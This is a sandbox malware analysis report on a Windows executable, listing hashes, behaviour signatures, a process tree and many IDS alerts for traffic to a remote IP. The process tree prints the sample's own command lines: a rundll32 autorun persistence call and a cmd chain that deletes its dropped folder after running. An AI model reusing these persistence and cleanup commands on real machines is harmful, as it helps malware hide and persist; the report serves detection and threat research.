Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
otsIBG7J9b.exe

Overview

General Information

Sample name:otsIBG7J9b.exe
renamed because original name is a hash value
Original sample name:04cc92b4e0f79ba841ba3c76651c8968d6525d4805829dd875f7a34034ffa460.exe
Analysis ID:1573196
MD5:8a971e9fe9fa2c3005ee1eb9c143b331
SHA1:80260d696b4a945acddb747c3beb97604a060d70
SHA256:04cc92b4e0f79ba841ba3c76651c8968d6525d4805829dd875f7a34034ffa460
Tags:104-21-50-174exeuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to infect the boot sector
Creates an autostart registry key pointing to binary in C:\Windows
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries disk data (e.g. SMART data)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Abnormal high CPU Usage
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • otsIBG7J9b.exe (PID: 3140 cmdline: "C:\Users\user\Desktop\otsIBG7J9b.exe" MD5: 8A971E9FE9FA2C3005EE1EB9C143B331)
    • cmd.exe (PID: 3652 cmdline: cmd.exe /c ping 127.0.0.1 -n 2&c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 2180 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • ufcpp.exe (PID: 2916 cmdline: c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe" MD5: 1B4C7D94BCF61F9CCE0B29C2D879EE73)
        • rundll32.exe (PID: 6644 cmdline: c:\windows\system32\rundll32.exe "c:\agtve\yhnvs.dll",init c:\ufcpp.exe MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 3384 cmdline: "C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 7020 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 2996 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 6104 cmdline: "C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 3732 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3756 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\SysWOW64\rundll32.exe "c:\agtve\yhnvs.dll",init, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6644, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EvtMgr

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-11T16:24:39.390346+010028032742Potentially Bad Traffic192.168.2.449780202.108.0.5280TCP
2024-12-11T16:24:42.096696+010028032742Potentially Bad Traffic192.168.2.449808202.108.0.5280TCP
2024-12-11T16:24:46.116860+010028032742Potentially Bad Traffic192.168.2.449844202.108.0.5280TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.464270107.163.241.23212354TCP
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.449353107.163.241.23212354TCP
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.449191107.163.241.23212354TCP
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.465253107.163.241.23212354TCP
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.464406107.163.241.23212354TCP
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.465101107.163.241.23212354TCP
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.464546107.163.241.23212354TCP
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.464868107.163.241.23212354TCP
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.449188107.163.241.23212354TCP
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.464711107.163.241.23212354TCP
2024-12-11T16:24:28.697302+010028032702Potentially Bad Traffic192.168.2.464990107.163.241.23212354TCP
2024-12-11T16:24:36.157878+010028032702Potentially Bad Traffic192.168.2.449753107.163.241.23212354TCP
2024-12-11T16:24:36.157882+010028032702Potentially Bad Traffic192.168.2.449754107.163.241.23212354TCP
2024-12-11T16:24:38.514508+010028032702Potentially Bad Traffic192.168.2.449771107.163.241.23212354TCP
2024-12-11T16:24:38.518621+010028032702Potentially Bad Traffic192.168.2.449772107.163.241.23212354TCP
2024-12-11T16:24:40.292310+010028032702Potentially Bad Traffic192.168.2.449788107.163.241.23212354TCP
2024-12-11T16:24:40.292406+010028032702Potentially Bad Traffic192.168.2.449790107.163.241.23212354TCP
2024-12-11T16:24:42.536858+010028032702Potentially Bad Traffic192.168.2.449805107.163.241.23212354TCP
2024-12-11T16:24:42.643495+010028032702Potentially Bad Traffic192.168.2.449807107.163.241.23212354TCP
2024-12-11T16:24:44.306708+010028032702Potentially Bad Traffic192.168.2.449823107.163.241.23212354TCP
2024-12-11T16:24:44.306728+010028032702Potentially Bad Traffic192.168.2.449826107.163.241.23212354TCP
2024-12-11T16:24:46.548874+010028032702Potentially Bad Traffic192.168.2.449842107.163.241.23212354TCP
2024-12-11T16:24:46.661184+010028032702Potentially Bad Traffic192.168.2.449845107.163.241.23212354TCP
2024-12-11T16:24:48.484657+010028032702Potentially Bad Traffic192.168.2.449861107.163.241.23212354TCP
2024-12-11T16:24:48.490055+010028032702Potentially Bad Traffic192.168.2.449860107.163.241.23212354TCP
2024-12-11T16:24:50.725707+010028032702Potentially Bad Traffic192.168.2.449873107.163.241.23212354TCP
2024-12-11T16:24:50.878227+010028032702Potentially Bad Traffic192.168.2.449876107.163.241.23212354TCP
2024-12-11T16:24:52.478623+010028032702Potentially Bad Traffic192.168.2.449895107.163.241.23212354TCP
2024-12-11T16:24:52.478655+010028032702Potentially Bad Traffic192.168.2.449896107.163.241.23212354TCP
2024-12-11T16:24:54.721811+010028032702Potentially Bad Traffic192.168.2.449910107.163.241.23212354TCP
2024-12-11T16:24:54.834910+010028032702Potentially Bad Traffic192.168.2.449913107.163.241.23212354TCP
2024-12-11T16:24:56.482117+010028032702Potentially Bad Traffic192.168.2.449932107.163.241.23212354TCP
2024-12-11T16:24:56.482225+010028032702Potentially Bad Traffic192.168.2.449930107.163.241.23212354TCP
2024-12-11T16:24:58.891215+010028032702Potentially Bad Traffic192.168.2.449947107.163.241.23212354TCP
2024-12-11T16:24:58.891228+010028032702Potentially Bad Traffic192.168.2.449949107.163.241.23212354TCP
2024-12-11T16:25:00.494438+010028032702Potentially Bad Traffic192.168.2.449971107.163.241.23212354TCP
2024-12-11T16:25:00.494489+010028032702Potentially Bad Traffic192.168.2.449969107.163.241.23212354TCP
2024-12-11T16:25:02.735683+010028032702Potentially Bad Traffic192.168.2.449985107.163.241.23212354TCP
2024-12-11T16:25:02.844422+010028032702Potentially Bad Traffic192.168.2.449987107.163.241.23212354TCP
2024-12-11T16:25:04.494699+010028032702Potentially Bad Traffic192.168.2.450008107.163.241.23212354TCP
2024-12-11T16:25:04.494714+010028032702Potentially Bad Traffic192.168.2.450005107.163.241.23212354TCP
2024-12-11T16:25:06.736002+010028032702Potentially Bad Traffic192.168.2.450024107.163.241.23212354TCP
2024-12-11T16:25:06.842788+010028032702Potentially Bad Traffic192.168.2.450027107.163.241.23212354TCP
2024-12-11T16:25:08.494548+010028032702Potentially Bad Traffic192.168.2.450048107.163.241.23212354TCP
2024-12-11T16:25:08.494721+010028032702Potentially Bad Traffic192.168.2.450046107.163.241.23212354TCP
2024-12-11T16:25:10.735319+010028032702Potentially Bad Traffic192.168.2.450064107.163.241.23212354TCP
2024-12-11T16:25:10.845892+010028032702Potentially Bad Traffic192.168.2.450066107.163.241.23212354TCP
2024-12-11T16:25:12.509947+010028032702Potentially Bad Traffic192.168.2.450088107.163.241.23212354TCP
2024-12-11T16:25:12.509981+010028032702Potentially Bad Traffic192.168.2.450086107.163.241.23212354TCP
2024-12-11T16:25:14.750650+010028032702Potentially Bad Traffic192.168.2.450104107.163.241.23212354TCP
2024-12-11T16:25:14.860488+010028032702Potentially Bad Traffic192.168.2.450106107.163.241.23212354TCP
2024-12-11T16:25:16.525402+010028032702Potentially Bad Traffic192.168.2.450131107.163.241.23212354TCP
2024-12-11T16:25:16.525444+010028032702Potentially Bad Traffic192.168.2.450129107.163.241.23212354TCP
2024-12-11T16:25:18.769808+010028032702Potentially Bad Traffic192.168.2.450147107.163.241.23212354TCP
2024-12-11T16:25:18.876156+010028032702Potentially Bad Traffic192.168.2.450150107.163.241.23212354TCP
2024-12-11T16:25:20.525455+010028032702Potentially Bad Traffic192.168.2.450175107.163.241.23212354TCP
2024-12-11T16:25:20.525506+010028032702Potentially Bad Traffic192.168.2.450173107.163.241.23212354TCP
2024-12-11T16:25:22.792505+010028032702Potentially Bad Traffic192.168.2.450192107.163.241.23212354TCP
2024-12-11T16:25:22.891593+010028032702Potentially Bad Traffic192.168.2.450195107.163.241.23212354TCP
2024-12-11T16:25:24.541239+010028032702Potentially Bad Traffic192.168.2.450226107.163.241.23212354TCP
2024-12-11T16:25:24.541291+010028032702Potentially Bad Traffic192.168.2.450223107.163.241.23212354TCP
2024-12-11T16:25:26.831324+010028032702Potentially Bad Traffic192.168.2.450240107.163.241.23212354TCP
2024-12-11T16:25:26.945832+010028032702Potentially Bad Traffic192.168.2.450243107.163.241.23212354TCP
2024-12-11T16:25:28.556573+010028032702Potentially Bad Traffic192.168.2.450270107.163.241.23212354TCP
2024-12-11T16:25:28.556587+010028032702Potentially Bad Traffic192.168.2.450267107.163.241.23212354TCP
2024-12-11T16:25:30.815887+010028032702Potentially Bad Traffic192.168.2.450295107.163.241.23212354TCP
2024-12-11T16:25:30.908704+010028032702Potentially Bad Traffic192.168.2.450298107.163.241.23212354TCP
2024-12-11T16:25:32.556917+010028032702Potentially Bad Traffic192.168.2.450324107.163.241.23212354TCP
2024-12-11T16:25:32.556918+010028032702Potentially Bad Traffic192.168.2.450321107.163.241.23212354TCP
2024-12-11T16:25:34.814073+010028032702Potentially Bad Traffic192.168.2.450356107.163.241.23212354TCP
2024-12-11T16:25:34.907607+010028032702Potentially Bad Traffic192.168.2.450359107.163.241.23212354TCP
2024-12-11T16:25:36.584446+010028032702Potentially Bad Traffic192.168.2.450389107.163.241.23212354TCP
2024-12-11T16:25:36.584477+010028032702Potentially Bad Traffic192.168.2.450392107.163.241.23212354TCP
2024-12-11T16:25:38.816702+010028032702Potentially Bad Traffic192.168.2.450423107.163.241.23212354TCP
2024-12-11T16:25:38.938875+010028032702Potentially Bad Traffic192.168.2.450429107.163.241.23212354TCP
2024-12-11T16:25:40.596717+010028032702Potentially Bad Traffic192.168.2.450470107.163.241.23212354TCP
2024-12-11T16:25:40.599334+010028032702Potentially Bad Traffic192.168.2.450467107.163.241.23212354TCP
2024-12-11T16:25:42.876772+010028032702Potentially Bad Traffic192.168.2.450500107.163.241.23212354TCP
2024-12-11T16:25:43.036718+010028032702Potentially Bad Traffic192.168.2.450502107.163.241.23212354TCP
2024-12-11T16:25:44.775395+010028032702Potentially Bad Traffic192.168.2.450563107.163.241.23212354TCP
2024-12-11T16:25:44.775418+010028032702Potentially Bad Traffic192.168.2.450557107.163.241.23212354TCP
2024-12-11T16:25:47.035608+010028032702Potentially Bad Traffic192.168.2.450618107.163.241.23212354TCP
2024-12-11T16:25:47.128262+010028032702Potentially Bad Traffic192.168.2.450622107.163.241.23212354TCP
2024-12-11T16:25:48.775656+010028032702Potentially Bad Traffic192.168.2.450692107.163.241.23212354TCP
2024-12-11T16:25:48.775720+010028032702Potentially Bad Traffic192.168.2.450687107.163.241.23212354TCP
2024-12-11T16:25:51.004471+010028032702Potentially Bad Traffic192.168.2.450748107.163.241.23212354TCP
2024-12-11T16:25:51.130712+010028032702Potentially Bad Traffic192.168.2.450753107.163.241.23212354TCP
2024-12-11T16:25:52.776134+010028032702Potentially Bad Traffic192.168.2.450835107.163.241.23212354TCP
2024-12-11T16:25:52.776552+010028032702Potentially Bad Traffic192.168.2.450837107.163.241.23212354TCP
2024-12-11T16:25:55.020598+010028032702Potentially Bad Traffic192.168.2.450912107.163.241.23212354TCP
2024-12-11T16:25:55.128647+010028032702Potentially Bad Traffic192.168.2.450919107.163.241.23212354TCP
2024-12-11T16:25:56.792472+010028032702Potentially Bad Traffic192.168.2.451050107.163.241.23212354TCP
2024-12-11T16:25:56.792542+010028032702Potentially Bad Traffic192.168.2.451045107.163.241.23212354TCP
2024-12-11T16:25:59.036648+010028032702Potentially Bad Traffic192.168.2.451141107.163.241.23212354TCP
2024-12-11T16:25:59.143436+010028032702Potentially Bad Traffic192.168.2.451148107.163.241.23212354TCP
2024-12-11T16:26:00.806896+010028032702Potentially Bad Traffic192.168.2.451284107.163.241.23212354TCP
2024-12-11T16:26:00.806916+010028032702Potentially Bad Traffic192.168.2.451278107.163.241.23212354TCP
2024-12-11T16:26:03.211497+010028032702Potentially Bad Traffic192.168.2.451378107.163.241.23212354TCP
2024-12-11T16:26:03.212486+010028032702Potentially Bad Traffic192.168.2.451386107.163.241.23212354TCP
2024-12-11T16:26:04.856856+010028032702Potentially Bad Traffic192.168.2.451468107.163.241.23212354TCP
2024-12-11T16:26:04.856876+010028032702Potentially Bad Traffic192.168.2.451478107.163.241.23212354TCP
2024-12-11T16:26:07.095423+010028032702Potentially Bad Traffic192.168.2.451568107.163.241.23212354TCP
2024-12-11T16:26:07.224592+010028032702Potentially Bad Traffic192.168.2.451577107.163.241.23212354TCP
2024-12-11T16:26:08.958613+010028032702Potentially Bad Traffic192.168.2.451666107.163.241.23212354TCP
2024-12-11T16:26:08.958711+010028032702Potentially Bad Traffic192.168.2.451658107.163.241.23212354TCP
2024-12-11T16:26:11.210836+010028032702Potentially Bad Traffic192.168.2.451739107.163.241.23212354TCP
2024-12-11T16:26:11.312796+010028032702Potentially Bad Traffic192.168.2.451741107.163.241.23212354TCP
2024-12-11T16:26:12.978532+010028032702Potentially Bad Traffic192.168.2.452288107.163.241.23212354TCP
2024-12-11T16:26:12.978584+010028032702Potentially Bad Traffic192.168.2.452374107.163.241.23212354TCP
2024-12-11T16:26:15.223621+010028032702Potentially Bad Traffic192.168.2.453686107.163.241.23212354TCP
2024-12-11T16:26:15.333014+010028032702Potentially Bad Traffic192.168.2.453818107.163.241.23212354TCP
2024-12-11T16:26:16.994407+010028032702Potentially Bad Traffic192.168.2.455673107.163.241.23212354TCP
2024-12-11T16:26:16.994437+010028032702Potentially Bad Traffic192.168.2.455654107.163.241.23212354TCP
2024-12-11T16:26:19.223527+010028032702Potentially Bad Traffic192.168.2.456252107.163.241.23212354TCP
2024-12-11T16:26:19.345466+010028032702Potentially Bad Traffic192.168.2.456358107.163.241.23212354TCP
2024-12-11T16:26:21.010412+010028032702Potentially Bad Traffic192.168.2.457170107.163.241.23212354TCP
2024-12-11T16:26:21.010454+010028032702Potentially Bad Traffic192.168.2.457220107.163.241.23212354TCP
2024-12-11T16:26:23.238351+010028032702Potentially Bad Traffic192.168.2.458813107.163.241.23212354TCP
2024-12-11T16:26:23.362542+010028032702Potentially Bad Traffic192.168.2.458979107.163.241.23212354TCP
2024-12-11T16:26:25.038176+010028032702Potentially Bad Traffic192.168.2.460620107.163.241.23212354TCP
2024-12-11T16:26:25.038237+010028032702Potentially Bad Traffic192.168.2.460535107.163.241.23212354TCP
2024-12-11T16:26:27.268715+010028032702Potentially Bad Traffic192.168.2.462221107.163.241.23212354TCP
2024-12-11T16:26:27.395525+010028032702Potentially Bad Traffic192.168.2.462240107.163.241.23212354TCP
2024-12-11T16:26:29.071484+010028032702Potentially Bad Traffic192.168.2.464295107.163.241.23212354TCP
2024-12-11T16:26:29.071661+010028032702Potentially Bad Traffic192.168.2.464094107.163.241.23212354TCP
2024-12-11T16:26:31.570223+010028032702Potentially Bad Traffic192.168.2.449297107.163.241.23212354TCP
2024-12-11T16:26:31.596487+010028032702Potentially Bad Traffic192.168.2.449302107.163.241.23212354TCP
2024-12-11T16:26:33.265013+010028032702Potentially Bad Traffic192.168.2.451043107.163.241.23212354TCP
2024-12-11T16:26:33.265050+010028032702Potentially Bad Traffic192.168.2.451032107.163.241.23212354TCP
2024-12-11T16:26:35.519152+010028032702Potentially Bad Traffic192.168.2.451600107.163.241.23212354TCP
2024-12-11T16:26:35.783109+010028032702Potentially Bad Traffic192.168.2.451644107.163.241.23212354TCP
2024-12-11T16:26:37.467031+010028032702Potentially Bad Traffic192.168.2.452742107.163.241.23212354TCP
2024-12-11T16:26:37.467250+010028032702Potentially Bad Traffic192.168.2.452531107.163.241.23212354TCP
2024-12-11T16:26:39.736435+010028032702Potentially Bad Traffic192.168.2.454225107.163.241.23212354TCP
2024-12-11T16:26:39.814944+010028032702Potentially Bad Traffic192.168.2.454301107.163.241.23212354TCP
2024-12-11T16:26:41.479625+010028032702Potentially Bad Traffic192.168.2.456134107.163.241.23212354TCP
2024-12-11T16:26:41.479643+010028032702Potentially Bad Traffic192.168.2.456227107.163.241.23212354TCP
2024-12-11T16:26:43.723685+010028032702Potentially Bad Traffic192.168.2.457709107.163.241.23212354TCP
2024-12-11T16:26:43.830584+010028032702Potentially Bad Traffic192.168.2.457840107.163.241.23212354TCP
2024-12-11T16:26:45.494164+010028032702Potentially Bad Traffic192.168.2.459956107.163.241.23212354TCP
2024-12-11T16:26:45.494181+010028032702Potentially Bad Traffic192.168.2.459963107.163.241.23212354TCP
2024-12-11T16:26:47.737377+010028032702Potentially Bad Traffic192.168.2.460164107.163.241.23212354TCP
2024-12-11T16:26:47.847465+010028032702Potentially Bad Traffic192.168.2.460300107.163.241.23212354TCP
2024-12-11T16:26:49.510096+010028032702Potentially Bad Traffic192.168.2.461535107.163.241.23212354TCP
2024-12-11T16:26:49.510441+010028032702Potentially Bad Traffic192.168.2.461430107.163.241.23212354TCP
2024-12-11T16:26:51.739438+010028032702Potentially Bad Traffic192.168.2.463248107.163.241.23212354TCP
2024-12-11T16:26:51.862153+010028032702Potentially Bad Traffic192.168.2.463325107.163.241.23212354TCP
2024-12-11T16:26:53.525972+010028032702Potentially Bad Traffic192.168.2.465122107.163.241.23212354TCP
2024-12-11T16:26:53.526041+010028032702Potentially Bad Traffic192.168.2.465178107.163.241.23212354TCP
2024-12-11T16:26:55.752810+010028032702Potentially Bad Traffic192.168.2.450596107.163.241.23212354TCP
2024-12-11T16:26:55.877516+010028032702Potentially Bad Traffic192.168.2.450672107.163.241.23212354TCP
2024-12-11T16:26:57.529130+010028032702Potentially Bad Traffic192.168.2.452411107.163.241.23212354TCP
2024-12-11T16:26:57.529166+010028032702Potentially Bad Traffic192.168.2.452408107.163.241.23212354TCP
2024-12-11T16:26:59.768104+010028032702Potentially Bad Traffic192.168.2.453875107.163.241.23212354TCP
2024-12-11T16:26:59.878391+010028032702Potentially Bad Traffic192.168.2.453961107.163.241.23212354TCP
2024-12-11T16:27:01.656626+010028032702Potentially Bad Traffic192.168.2.454958107.163.241.23212354TCP
2024-12-11T16:27:01.656887+010028032702Potentially Bad Traffic192.168.2.454837107.163.241.23212354TCP
2024-12-11T16:27:04.130034+010028032702Potentially Bad Traffic192.168.2.455711107.163.241.23212354TCP
2024-12-11T16:27:04.418954+010028032702Potentially Bad Traffic192.168.2.455703107.163.241.23212354TCP
2024-12-11T16:27:05.778964+010028032702Potentially Bad Traffic192.168.2.458094107.163.241.23212354TCP
2024-12-11T16:27:05.778978+010028032702Potentially Bad Traffic192.168.2.457677107.163.241.23212354TCP
2024-12-11T16:27:08.096373+010028032702Potentially Bad Traffic192.168.2.459142107.163.241.23212354TCP
2024-12-11T16:27:08.236768+010028032702Potentially Bad Traffic192.168.2.459184107.163.241.23212354TCP
2024-12-11T16:27:09.807879+010028032702Potentially Bad Traffic192.168.2.460899107.163.241.23212354TCP
2024-12-11T16:27:09.808007+010028032702Potentially Bad Traffic192.168.2.460763107.163.241.23212354TCP
2024-12-11T16:27:12.081770+010028032702Potentially Bad Traffic192.168.2.462496107.163.241.23212354TCP
2024-12-11T16:27:12.205382+010028032702Potentially Bad Traffic192.168.2.462586107.163.241.23212354TCP
2024-12-11T16:27:13.975116+010028032702Potentially Bad Traffic192.168.2.464312107.163.241.23212354TCP
2024-12-11T16:27:13.975122+010028032702Potentially Bad Traffic192.168.2.464241107.163.241.23212354TCP
2024-12-11T16:27:16.222658+010028032702Potentially Bad Traffic192.168.2.465063107.163.241.23212354TCP
2024-12-11T16:27:16.377914+010028032702Potentially Bad Traffic192.168.2.465171107.163.241.23212354TCP
2024-12-11T16:27:18.155237+010028032702Potentially Bad Traffic192.168.2.449941107.163.241.23212354TCP
2024-12-11T16:27:18.155581+010028032702Potentially Bad Traffic192.168.2.449778107.163.241.23212354TCP
2024-12-11T16:27:20.403528+010028032702Potentially Bad Traffic192.168.2.450909107.163.241.23212354TCP
2024-12-11T16:27:20.594775+010028032702Potentially Bad Traffic192.168.2.450940107.163.241.23212354TCP
2024-12-11T16:27:22.361344+010028032702Potentially Bad Traffic192.168.2.453079107.163.241.23212354TCP
2024-12-11T16:27:22.361485+010028032702Potentially Bad Traffic192.168.2.452883107.163.241.23212354TCP
2024-12-11T16:27:24.722318+010028032702Potentially Bad Traffic192.168.2.454632107.163.241.23212354TCP
2024-12-11T16:27:24.737087+010028032702Potentially Bad Traffic192.168.2.454647107.163.241.23212354TCP
2024-12-11T16:27:26.488187+010028032702Potentially Bad Traffic192.168.2.456578107.163.241.23212354TCP
2024-12-11T16:27:26.488330+010028032702Potentially Bad Traffic192.168.2.456499107.163.241.23212354TCP
2024-12-11T16:27:28.906358+010028032702Potentially Bad Traffic192.168.2.457853107.163.241.23212354TCP
2024-12-11T16:27:28.910306+010028032702Potentially Bad Traffic192.168.2.457918107.163.241.23212354TCP
2024-12-11T16:27:30.644850+010028032702Potentially Bad Traffic192.168.2.459080107.163.241.23212354TCP
2024-12-11T16:27:30.644850+010028032702Potentially Bad Traffic192.168.2.459082107.163.241.23212354TCP
2024-12-11T16:27:32.880265+010028032702Potentially Bad Traffic192.168.2.460079107.163.241.23212354TCP
2024-12-11T16:27:33.003061+010028032702Potentially Bad Traffic192.168.2.460227107.163.241.23212354TCP
2024-12-11T16:27:34.878143+010028032702Potentially Bad Traffic192.168.2.461240107.163.241.23212354TCP
2024-12-11T16:27:34.882344+010028032702Potentially Bad Traffic192.168.2.461332107.163.241.23212354TCP
2024-12-11T16:27:37.224816+010028032702Potentially Bad Traffic192.168.2.462610107.163.241.23212354TCP
2024-12-11T16:27:37.537221+010028032702Potentially Bad Traffic192.168.2.462613107.163.241.23212354TCP
2024-12-11T16:27:39.245797+010028032702Potentially Bad Traffic192.168.2.464627107.163.241.23212354TCP
2024-12-11T16:27:39.245831+010028032702Potentially Bad Traffic192.168.2.464462107.163.241.23212354TCP
2024-12-11T16:27:41.488676+010028032702Potentially Bad Traffic192.168.2.449506107.163.241.23212354TCP
2024-12-11T16:27:41.628346+010028032702Potentially Bad Traffic192.168.2.449593107.163.241.23212354TCP
2024-12-11T16:27:43.288745+010028032702Potentially Bad Traffic192.168.2.450767107.163.241.23212354TCP
2024-12-11T16:27:43.288794+010028032702Potentially Bad Traffic192.168.2.450611107.163.241.23212354TCP
2024-12-11T16:27:45.518926+010028032702Potentially Bad Traffic192.168.2.451437107.163.241.23212354TCP
2024-12-11T16:27:45.660031+010028032702Potentially Bad Traffic192.168.2.451444107.163.241.23212354TCP
2024-12-11T16:27:47.275479+010028032702Potentially Bad Traffic192.168.2.453345107.163.241.23212354TCP
2024-12-11T16:27:47.275577+010028032702Potentially Bad Traffic192.168.2.453248107.163.241.23212354TCP
2024-12-11T16:27:49.519461+010028032702Potentially Bad Traffic192.168.2.454800107.163.241.23212354TCP
2024-12-11T16:27:49.628592+010028032702Potentially Bad Traffic192.168.2.454887107.163.241.23212354TCP
2024-12-11T16:27:51.290912+010028032702Potentially Bad Traffic192.168.2.456382107.163.241.23212354TCP
2024-12-11T16:27:51.292458+010028032702Potentially Bad Traffic192.168.2.456402107.163.241.23212354TCP
2024-12-11T16:27:53.517082+010028032702Potentially Bad Traffic192.168.2.457106107.163.241.23212354TCP
2024-12-11T16:27:53.647532+010028032702Potentially Bad Traffic192.168.2.457159107.163.241.23212354TCP
2024-12-11T16:27:55.307185+010028032702Potentially Bad Traffic192.168.2.458391107.163.241.23212354TCP
2024-12-11T16:27:55.307207+010028032702Potentially Bad Traffic192.168.2.458418107.163.241.23212354TCP
2024-12-11T16:27:57.532695+010028032702Potentially Bad Traffic192.168.2.459860107.163.241.23212354TCP
2024-12-11T16:27:57.690495+010028032702Potentially Bad Traffic192.168.2.459960107.163.241.23212354TCP
2024-12-11T16:27:59.472742+010028032702Potentially Bad Traffic192.168.2.462038107.163.241.23212354TCP
2024-12-11T16:27:59.472770+010028032702Potentially Bad Traffic192.168.2.462150107.163.241.23212354TCP
2024-12-11T16:28:01.758451+010028032702Potentially Bad Traffic192.168.2.463631107.163.241.23212354TCP
2024-12-11T16:28:01.862756+010028032702Potentially Bad Traffic192.168.2.463702107.163.241.23212354TCP
2024-12-11T16:28:03.565068+010028032702Potentially Bad Traffic192.168.2.464439107.163.241.23212354TCP
2024-12-11T16:28:03.565096+010028032702Potentially Bad Traffic192.168.2.464580107.163.241.23212354TCP
2024-12-11T16:28:05.860338+010028032702Potentially Bad Traffic192.168.2.465394107.163.241.23212354TCP
2024-12-11T16:28:05.928322+010028032702Potentially Bad Traffic192.168.2.465425107.163.241.23212354TCP
2024-12-11T16:28:07.572292+010028032702Potentially Bad Traffic192.168.2.450784107.163.241.23212354TCP
2024-12-11T16:28:07.572326+010028032702Potentially Bad Traffic192.168.2.450786107.163.241.23212354TCP
2024-12-11T16:28:09.815792+010028032702Potentially Bad Traffic192.168.2.451537107.163.241.23212354TCP
2024-12-11T16:28:09.923821+010028032702Potentially Bad Traffic192.168.2.451675107.163.241.23212354TCP
2024-12-11T16:28:11.601739+010028032702Potentially Bad Traffic192.168.2.452693107.163.241.23212354TCP
2024-12-11T16:28:11.601781+010028032702Potentially Bad Traffic192.168.2.452558107.163.241.23212354TCP
2024-12-11T16:28:13.849785+010028032702Potentially Bad Traffic192.168.2.453852107.163.241.23212354TCP
2024-12-11T16:28:14.066138+010028032702Potentially Bad Traffic192.168.2.453858107.163.241.23212354TCP
2024-12-11T16:28:15.775512+010028032702Potentially Bad Traffic192.168.2.455592107.163.241.23212354TCP
2024-12-11T16:28:15.775674+010028032702Potentially Bad Traffic192.168.2.455780107.163.241.23212354TCP
2024-12-11T16:28:18.018821+010028032702Potentially Bad Traffic192.168.2.457024107.163.241.23212354TCP
2024-12-11T16:28:18.127449+010028032702Potentially Bad Traffic192.168.2.457172107.163.241.23212354TCP
